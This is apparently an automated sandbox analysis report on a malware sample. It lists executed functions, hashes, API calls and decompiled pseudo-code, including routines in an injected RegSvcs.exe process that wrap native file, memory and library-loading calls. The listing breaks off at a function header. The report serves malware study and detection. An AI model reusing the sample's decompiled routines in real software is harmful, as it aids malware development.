                                                                          • Source File: 00000000.00000002.267329997.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 070ea507657de7d472dc1fa8be64d3e1a76df552889ac291e795aad4916191c9
                                                                          • Instruction ID: 5aeb6d6f50a7fa2a0e3ef417bb2a781d3123ee9692f7140e154a93945a05db97
                                                                          • Opcode Fuzzy Hash: 070ea507657de7d472dc1fa8be64d3e1a76df552889ac291e795aad4916191c9
                                                                          • Instruction Fuzzy Hash: 5541B0B1D00309EFDB14CF99C884ADEBFB5BF48314F24856AE819AB250D7759945CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01673E40, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateActCtxA.KERNEL32(?), ref: 01675421
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.267329997.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: c67391010b544876c6fc98964abc75181840530742773ebc36fb124e43775b2c
                                                                          • Instruction ID: 42f3de4f0c095485ec6c105c4788a1f74f2641409a20c72cdf6cc5ac14b64e6c
                                                                          • Opcode Fuzzy Hash: c67391010b544876c6fc98964abc75181840530742773ebc36fb124e43775b2c
                                                                          • Instruction Fuzzy Hash: EE4115B1D0061CCFDB24DFA9C884BDEBBB5BF49304F208469D409AB255DB756945CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0167B938, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0167B9BF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.267329997.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 9bc2379c85324f188cc1ab079b88ab3d9d8f7fe429cca6972df52cf7bb4591a1
                                                                          • Instruction ID: fda79f68d160ee0d8c4ee6e4efc95e3e3105a326d5a2369b259c160c1485edb4
                                                                          • Opcode Fuzzy Hash: 9bc2379c85324f188cc1ab079b88ab3d9d8f7fe429cca6972df52cf7bb4591a1
                                                                          • Instruction Fuzzy Hash: 1021C6B59002089FDB10CFA9D984ADEBFF8FF49324F14841AE955A7310D374A944CFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01678780, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,016796D1,00000800,00000000,00000000), ref: 016798E2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.267329997.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: ec111b63ffea7161557fc75f4415098395910987b108e4f0078f3e906447289c
                                                                          • Instruction ID: 357dacedcf2393c1bf037cdccfafd329e536425346d2bdba84b3d56e8d91c5e6
                                                                          • Opcode Fuzzy Hash: ec111b63ffea7161557fc75f4415098395910987b108e4f0078f3e906447289c
                                                                          • Instruction Fuzzy Hash: 521106B6D00209CFDB10CFAAC844AEEBBF4EB49324F15892AD519A7200C375A545CFA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 016795F0, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 01679656
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.267329997.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: 888cf9848b9a8f6f1335dbb34e165ba838c4559c9f7d4acd877b8864e07b553e
                                                                          • Instruction ID: d7ac614b1c05e2fa231a82830ad9a2f07da935498bd50092c3b4a742cce4f78b
                                                                          • Opcode Fuzzy Hash: 888cf9848b9a8f6f1335dbb34e165ba838c4559c9f7d4acd877b8864e07b553e
                                                                          • Instruction Fuzzy Hash: E011E3B6C006598FDB10CF9AC844BDEFBF4AF89324F14852AD529B7600D379A545CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0148D4C4, Relevance: .1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.267093906.000000000148D000.00000040.00000001.sdmp, Offset: 0148D000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 64c24a09edceb7565a1aae04e0de2304d83239b0f63cfcb0c261ce9d0853413b
                                                                          • Instruction ID: 288f67259b505dc3753d04fd9e8793fbfabe23f0dc40ea5fb4f0008470986f55
                                                                          • Opcode Fuzzy Hash: 64c24a09edceb7565a1aae04e0de2304d83239b0f63cfcb0c261ce9d0853413b
                                                                          • Instruction Fuzzy Hash: DF21D671905240DFDB05EF98D9C0F6BBF65FB88718F24856BD8050B296C336D456C6B1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0148D3D8, Relevance: .1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.267093906.000000000148D000.00000040.00000001.sdmp, Offset: 0148D000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c40acd8d332b4b5c0a4bff11e8ccb3c36b5ecec8abf63e5cf9c8ae29a64f44d2
                                                                          • Instruction ID: 5a962525b87dc02324d018af993463d47af0b053fd3bb41f4b3fbdaabb0f78fc
                                                                          • Opcode Fuzzy Hash: c40acd8d332b4b5c0a4bff11e8ccb3c36b5ecec8abf63e5cf9c8ae29a64f44d2
                                                                          • Instruction Fuzzy Hash: 5D210871904204DFDB05EF98D9C0B5BBB65FB84724F24857AD8050B396C336E856CAA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0149D01C, Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.267127763.000000000149D000.00000040.00000001.sdmp, Offset: 0149D000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: adacaa001d71b81adf40a045a8606877318d64a559a6415e96de5ad5cebed0b5
                                                                          • Instruction ID: 407f1d3b747c95ae03d003a4db60057e9325f218b907a7f9903c06fe36b56fc5
                                                                          • Opcode Fuzzy Hash: adacaa001d71b81adf40a045a8606877318d64a559a6415e96de5ad5cebed0b5
                                                                          • Instruction Fuzzy Hash: 952103B1904200DFDF15CFA4D8C4B26BFA5FB84358F24C96AD84A0B356C33AD807CA61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0149D1D4, Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.267127763.000000000149D000.00000040.00000001.sdmp, Offset: 0149D000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 00a6be460ab20b7d92957bba5f0e7f1eb4e0f8015f9365e98f4f523e81dd71bd
                                                                          • Instruction ID: 76d725659c0393f25dd73dd9ab12d1bc77a490364f57eb25c8240c07e6f9dd16
                                                                          • Opcode Fuzzy Hash: 00a6be460ab20b7d92957bba5f0e7f1eb4e0f8015f9365e98f4f523e81dd71bd
                                                                          • Instruction Fuzzy Hash: 2721F575904200DFDF05CFA4D9C0B26BFA5FB84324F24C9AED8494B356C336D846CA61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0149D006, Relevance: .1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.267127763.000000000149D000.00000040.00000001.sdmp, Offset: 0149D000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a84a63ec488bb9758ce0af809c3ac464dba5f543c4c27b84a57da623a123f377
                                                                          • Instruction ID: d7a0f48d589be0ad40084b69679ed36474d536ecf2bacb0ec70122cb161807ec
                                                                          • Opcode Fuzzy Hash: a84a63ec488bb9758ce0af809c3ac464dba5f543c4c27b84a57da623a123f377
                                                                          • Instruction Fuzzy Hash: 5B2180755093808FDB02CF64D594716BF71EF46214F28C5DBD8498B6A7C33A980ACB62
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0148D3D3, Relevance: .1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.267093906.000000000148D000.00000040.00000001.sdmp, Offset: 0148D000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 902b16dd5df5a707e43502a4c3ce064cda316cc5765cec77e44d61d1bdab8317
                                                                          • Instruction ID: b6c37271246e73cfbb1d880a2bcfbe568bf5792e42f78237cc7eb09ca940b4f7
                                                                          • Opcode Fuzzy Hash: 902b16dd5df5a707e43502a4c3ce064cda316cc5765cec77e44d61d1bdab8317
                                                                          • Instruction Fuzzy Hash: 4311D272804240DFDB02DF48D5C0B5ABF71FB84320F2482AAD8050B766C33AD45ACB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0148D4BF, Relevance: .1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.267093906.000000000148D000.00000040.00000001.sdmp, Offset: 0148D000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 902b16dd5df5a707e43502a4c3ce064cda316cc5765cec77e44d61d1bdab8317
                                                                          • Instruction ID: e8d9ea992fecd5fdfd34927f41bff9a5db8c52bb63d01d04e87c4bb724b291db
                                                                          • Opcode Fuzzy Hash: 902b16dd5df5a707e43502a4c3ce064cda316cc5765cec77e44d61d1bdab8317
                                                                          • Instruction Fuzzy Hash: EB11B176805280DFDB12DF54D9C4B1ABF71FB84324F24C6AAD8450B766C336D45ACBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0149D1CF, Relevance: .1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.267127763.000000000149D000.00000040.00000001.sdmp, Offset: 0149D000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: deee60406d66ec89b377f23f0127d2298a1e2cce8956a74edbc4243175f6b6bf
                                                                          • Instruction ID: 4891631f20eb492e35c9c2d62e8e121f95b3fa0e10f66a9757b938de78bb6945
                                                                          • Opcode Fuzzy Hash: deee60406d66ec89b377f23f0127d2298a1e2cce8956a74edbc4243175f6b6bf
                                                                          • Instruction Fuzzy Hash: A9118B75904280DFDF12CF54D5C4B16BFA1FB85224F28C6AAD8494B7A6C33AD44ACB61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0148D745, Relevance: .0, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.267093906.000000000148D000.00000040.00000001.sdmp, Offset: 0148D000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 51ead945882f7f45c6518d872c36977ad96ffe373b1e0b577d7cc825bd85e66b
                                                                          • Instruction ID: bfbd1e4f620e6cfdf308838336ce3477180e30d339e552f53ee24a48005fc05b
                                                                          • Opcode Fuzzy Hash: 51ead945882f7f45c6518d872c36977ad96ffe373b1e0b577d7cc825bd85e66b
                                                                          • Instruction Fuzzy Hash: F801F7718053C09AF7107AA6CC84BABBB9CDF41268F08C92BED040A396D3799845C6B5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0148D744, Relevance: .0, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.267093906.000000000148D000.00000040.00000001.sdmp, Offset: 0148D000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: df3a329a173025848a7dd5b39dcf902af8f76cc2eb8d8f3783cce5b8f1f7b8a6
                                                                          • Instruction ID: dc3f10adbc7934b224996076a47629fa1ce7ef016c84b23f70025177c136aada
                                                                          • Opcode Fuzzy Hash: df3a329a173025848a7dd5b39dcf902af8f76cc2eb8d8f3783cce5b8f1f7b8a6
                                                                          • Instruction Fuzzy Hash: 7EF0C2714052849AFB109E5ACC84B67FF98EF81274F18C45BED080F386C3799844CAB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 0167E5F0, Relevance: .3, Instructions: 315COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.267329997.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5dc5f36072de8ece037b403fed9abcd08f220c6d4474d4b513f64427c858f84b
                                                                          • Instruction ID: c2444c088ff6b1c3a17fd1e2c8be2cf53251796d9bcd75fe961aa330b2861eef
                                                                          • Opcode Fuzzy Hash: 5dc5f36072de8ece037b403fed9abcd08f220c6d4474d4b513f64427c858f84b
                                                                          • Instruction Fuzzy Hash: 5912C4F14197468BF730DF65E8981893BB1F745328F928208D2617FAEAD7B8154ACF84
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0167C194, Relevance: .3, Instructions: 265COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.267329997.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2ff64e1279bd6d9c772a64dfdf8f9cd2cb4fc681d4e59d95580de02c1978152a
                                                                          • Instruction ID: 4f3fa2191909d4bc46f0a01a97fa9d68a2bc771988eacfca74c6d05cec9c4782
                                                                          • Opcode Fuzzy Hash: 2ff64e1279bd6d9c772a64dfdf8f9cd2cb4fc681d4e59d95580de02c1978152a
                                                                          • Instruction Fuzzy Hash: FEA14B32E0021A8FCF15DFF9D8449DEBBB2FF85300B15856AE915BB265EB31A945CB40
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0167E5E0, Relevance: .2, Instructions: 225COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.267329997.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4ed0cd3f1ea64c0a04118b269dfb2710dfdb83656a47e87c0b24c7e7b85cc7f6
                                                                          • Instruction ID: 54fa7d3b2ab810415a31460bb273e68a5a4440e353cf1a5dca18a39a9a81a6ee
                                                                          • Opcode Fuzzy Hash: 4ed0cd3f1ea64c0a04118b269dfb2710dfdb83656a47e87c0b24c7e7b85cc7f6
                                                                          • Instruction Fuzzy Hash: B8C14EF18197458BF720DF64E8981897BB1FB85328F924308D1617FADAD7B8144ACF84
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Analysis Process: RegSvcs.exe PID: 1112 Parent PID: 1892 RegSvcs.exeCOMMON

                                                                          Executed Functions

                                                                          Function 0041867A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39filenativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186C5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID: A:A
                                                                          • API String ID: 2738559852-2859176346
                                                                          • Opcode ID: e4391c3208eefa8acb6ab95c494d009940cd7956795b2a0df01ba448159d5c77
                                                                          • Instruction ID: ab5817959eaaeb00b3b68b78b98493cdb6a9f42c9ecb8cf46a161500422af9f5
                                                                          • Opcode Fuzzy Hash: e4391c3208eefa8acb6ab95c494d009940cd7956795b2a0df01ba448159d5c77
                                                                          • Instruction Fuzzy Hash: E1F0EC71200209ABCB08DF89DC94DDB77ADAF8C754F158649FA0D97251DA30E8518BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418680, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 37%
                                                                          			E00418680(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				intOrPtr _t22;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a41
				_t22 = _a8;
				_t26 =  *_t28;
				_t18 =  *_t26(_t22, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
				return _t18;
			}








                                                                          0x00418683
                                                                          0x0041868f
                                                                          0x00418697
                                                                          0x0041869c
                                                                          0x004186bd
                                                                          0x004186c1
                                                                          0x004186c5
                                                                          0x004186c9

                                                                          APIs
                                                                          • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186C5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID: A:A
                                                                          • API String ID: 2738559852-2859176346
                                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                          • Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
                                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                          • Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00409B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00409B50(void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E0041AF60( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B380(_v8, _t24, __eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B600( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419710(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                          0x00409b59
                                                                          0x00409b6c
                                                                          0x00409b6f
                                                                          0x00409b74
                                                                          0x00409b79
                                                                          0x00409b83
                                                                          0x00409b88
                                                                          0x00409b8b
                                                                          0x00409b8d
                                                                          0x00409b95
                                                                          0x00409b9a
                                                                          0x00409b9a
                                                                          0x00409ba1
                                                                          0x00409ba9
                                                                          0x00409bac
                                                                          0x00409bae
                                                                          0x00409bc2
                                                                          0x00000000
                                                                          0x00409bc4
                                                                          0x00409bca
                                                                          0x00409b7e
                                                                          0x00409b7e
                                                                          0x00409b7e

                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                                          • Instruction ID: 6c7918579f63920fb86cd593affe8adf5c0c2a6eede5319f465e69fff998d711
                                                                          • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                                          • Instruction Fuzzy Hash: 140152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004185CB, Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 64%
                                                                          			E004185CB(void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				void* _v117;
				long _t22;
				void* _t34;

				asm("outsd");
				asm("in eax, 0xf5");
				_t16 = _a4;
				_t4 = _t16 + 0xc40; // 0xc40
				E004191D0(_t34, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t22 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t22;
			}






                                                                          0x004185cb
                                                                          0x004185cc
                                                                          0x004185d3
                                                                          0x004185df
                                                                          0x004185e7
                                                                          0x0041861d
                                                                          0x00418621

                                                                          APIs
                                                                          • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041861D
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 873533f8731280fd70d58967dd9584c488ce87b4c2b7140c58c93bd96238a518
                                                                          • Instruction ID: f13fa726c066822f58a3e61737c2b1b42c892671ff4e798296aad1ba3165767d
                                                                          • Opcode Fuzzy Hash: 873533f8731280fd70d58967dd9584c488ce87b4c2b7140c58c93bd96238a518
                                                                          • Instruction Fuzzy Hash: 3101AFB2201108ABCB58CF99DC95EEB77A9AF8C354F158248FA0DD7241D630E851CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004185D0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004185D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191D0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                          0x004185df
                                                                          0x004185e7
                                                                          0x0041861d
                                                                          0x00418621

                                                                          APIs
                                                                          • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041861D
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                          • Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
                                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                          • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004187B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191D0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                          0x004187bf
                                                                          0x004187c7
                                                                          0x004187e9
                                                                          0x004187ed

                                                                          APIs
                                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 004187E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateMemoryVirtual
                                                                          • String ID:
                                                                          • API String ID: 2167126740-0
                                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                          • Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
                                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                          • Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004187AA, Relevance: 1.5, APIs: 1, Instructions: 28memorynativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004187AA(void* __eax, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t15;

				_t11 = _a4;
				_t3 = _t11 + 0xc60; // 0xca0
				E004191D0(0x8bec8b55, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}




                                                                          0x004187b3
                                                                          0x004187bf
                                                                          0x004187c7
                                                                          0x004187e9
                                                                          0x004187ed

                                                                          APIs
                                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 004187E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateMemoryVirtual
                                                                          • String ID:
                                                                          • API String ID: 2167126740-0
                                                                          • Opcode ID: d3e0b2438a147bd9e25dfd96366cb08a8fc01704297245828094df7f10d1c80c
                                                                          • Instruction ID: 290efba4303a253068a3e06cfde146bf2becb0bcfc7eb6aafb9ea7287a74ccc8
                                                                          • Opcode Fuzzy Hash: d3e0b2438a147bd9e25dfd96366cb08a8fc01704297245828094df7f10d1c80c
                                                                          • Instruction Fuzzy Hash: 24F030B51101496BCB14DF98DC84CA777A9FF8C264B158A4DFD4897202C234D855CBB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004186FB, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
